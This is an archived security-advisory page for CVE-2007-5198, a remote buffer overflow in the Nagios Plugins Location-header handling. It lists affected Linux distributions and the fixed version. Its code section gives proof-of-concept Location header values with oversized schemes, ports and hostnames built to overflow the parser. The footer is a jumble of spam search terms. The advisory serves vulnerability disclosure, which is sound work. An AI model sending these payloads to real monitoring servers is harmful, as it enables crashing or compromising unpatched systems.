exploits , vulnerabilities , articles , Nagios Plugins Location Header Remote Buffer Overflow Vulnerability
| Title |
Nagios Plugins Location Header Remote Buffer Overflow Vulnerability |
| Published |
2007-06-16-12:00AM |
| Updated |
2008-03-19-04:20PM |
| Class |
Boundary Condition Error |
| CVE |
CVE-2007-5198 |
| Remote |
Yes |
| Local |
No |
| Credit |
Nobuhiro Ban is credited with the discovery of this issue. |
| Vulnerable |
Ubuntu Ubuntu Linux 6.06 LTS sparc Ubuntu Ubuntu Linux 6.06 LTS powerpc Ubuntu Ubuntu Linux 6.06 LTS i386 Ubuntu Ubuntu Linux 6.06 LTS amd64 S.u.S.E. UnitedLinux 1.0 S.u.S.E. SuSE Linux Standard Server 8.0 S.u.S.E. SuSE Linux School Server for i386 S.u.S.E. SUSE LINUX Retail Solution 8.0 S.u.S.E. SuSE Linux Openexchange Server 4.0 S.u.S.E. SuSE Linux OpenXchange 4.1 S.u.S.E. SUSE Linux Enterprise Server 9 SP3 S.u.S.E. SUSE Linux Enterprise Server 10 SP1 S.u.S.E. SUSE Linux Enterprise Server 10 S.u.S.E. SUSE Linux Enterprise Desktop 10 SP1 S.u.S.E. SUSE Linux Enterprise Desktop 10 S.u.S.E. SUSE Linux Enterprise 10 SP1 DEBUGINFO S.u.S.E. SUSE CORE 9 for x86 S.u.S.E. SLE SDK 9 S.u.S.E. SLE SDK 10.SP1 S.u.S.E. SLE SDK 10 S.u.S.E. openSUSE 10.3 S.u.S.E. openSUSE 10.2 S.u.S.E. openSUSE 10.1 S.u.S.E. OpenEnterpriseServer 9.0 S.u.S.E. OpenEnterpriseServer 1 S.u.S.E. OpenEnterpriseServer 0 S.u.S.E. Office Server S.u.S.E. Novell Linux POS 9 S.u.S.E. Novell Linux Desktop SDK 9.0 S.u.S.E. Novell Linux Desktop 9.0 S.u.S.E. Novell Linux Desktop 1.0 S.u.S.E. Novell Linux Desktop 9 S.u.S.E. Linux Professional 10.0 OSS S.u.S.E. Linux Professional 10.0 S.u.S.E. Linux Professional 9.3 x86_64 S.u.S.E. Linux Professional 9.3 S.u.S.E. Linux Professional 9.2 x86_64 S.u.S.E. Linux Professional 9.2 S.u.S.E. Linux Professional 9.1 x86_64 S.u.S.E. Linux Professional 9.1 S.u.S.E. Linux Professional 9.0 x86_64 S.u.S.E. Linux Professional 10.2 x86_64 S.u.S.E. Linux Professional 10.2 S.u.S.E. Linux Professional 10.1 S.u.S.E. Linux Personal 10.0 OSS S.u.S.E. Linux Personal 9.3 x86_64 S.u.S.E. Linux Personal 9.3 S.u.S.E. Linux Personal 9.2 x86_64 S.u.S.E. Linux Personal 9.2 S.u.S.E. Linux Personal 9.1 x86_64 S.u.S.E. Linux Personal 9.1 S.u.S.E. Linux Personal 10.2 x86_64 S.u.S.E. Linux Personal 10.2 S.u.S.E. Linux Personal 10.1 S.u.S.E. Linux Openexchange Server S.u.S.E. Linux Office Server S.u.S.E. Linux Enterprise Server SDK 9 S.u.S.E. Linux Enterprise Server for S/390 9.0 S.u.S.E. Linux Enterprise Server for S/390 S.u.S.E. Linux Enterprise Server 9SP3 S.u.S.E. Linux Enterprise Server 9 S.u.S.E. Linux Enterprise Server 10.SP1 S.u.S.E. Linux Enterprise Server 10 S.u.S.E. Linux Enterprise SDK 10 S.u.S.E. Linux Desktop 1.0 S.u.S.E. Linux Desktop 10 S.u.S.E. LINUX 9.1 Personal Edition CDROM S.u.S.E. Linux 8.1 S.u.S.E. Linux 8.0 i386 S.u.S.E. Linux 8.0 S.u.S.E. Linux 9.3 x8664 S.u.S.E. Linux 9.3 x86 S.u.S.E. Linux 10.1 x8664 S.u.S.E. Linux 10.1 x86 S.u.S.E. Linux 10.1 ppc S.u.S.E. Linux 10.0 x8664 S.u.S.E. Linux 10.0 x86 S.u.S.E. Linux 10.0 ppc Nagios Plugins 1.4.9 Nagios Plugins 1.4.2 MandrakeSoft Corporate Server 4.0 x86_64 MandrakeSoft Corporate Server 4.0 Gentoo Linux Debian Linux 3.1 sparc Debian Linux 3.1 s/390 Debian Linux 3.1 ppc Debian Linux 3.1 mipsel Debian Linux 3.1 mips Debian Linux 3.1 m68k Debian Linux 3.1 ia64 Debian Linux 3.1 ia32 Debian Linux 3.1 hppa Debian Linux 3.1 arm Debian Linux 3.1 amd64 Debian Linux 3.1 alpha Debian Linux 3.1 Debian Linux 4.0 sparc Debian Linux 4.0 s/390 Debian Linux 4.0 powerpc Debian Linux 4.0 mipsel Debian Linux 4.0 mips Debian Linux 4.0 m68k Debian Linux 4.0 ia64 Debian Linux 4.0 ia32 Debian Linux 4.0 hppa Debian Linux 4.0 arm Debian Linux 4.0 amd64 Debian Linux 4.0 alpha Debian Linux 4.0
|
| Not Vulnerable |
Nagios Plugins 1.4.10
|
| Code |
The following proof-of-concept URIs are available:Location: htttttttttttttttttttttttttttttttttttttttttttp://example.com/Location: http://example.com:1234567890123456789012345678901234567890/Location: http://tooooooooooooooooooooooooooooooooooooooooooooooooooo.loooooooooooooo oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.looooooooo ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.loooo oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong. loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo oong.looooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo ooooooong.loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo oooooooooooong.host-name.example.com/ |
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Tue, 02 Dec 2008 11:10:47 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
news for C free+sexy+ MyFrindhot 2.6.18 exp all cartoo Punyu 2 mu www.savith Sexsy%2Bwo Pinkyworld WWW.Vidio www.xvidoe www.xxl.se sexanimalv securityfo Www.Ainmal www,earlmi corbinfish w`ww`sex`c bathroom v Www.xnx.co www.sexoca bbs.lele92 confixx sexypoto dongli198. Www.xbooty WWW XNXXCO nansy-ajra www sexi c com_moodle www,earlmi MyFrindhot Sax images bbs.lelecy Latin freesxe sexwallpep www lesbi exploit po Punyu 2 mu www.18soon 3689 HOT GIRLS superman. www.sexoca stick www.zoo s PLone 200 /compo Indian por
|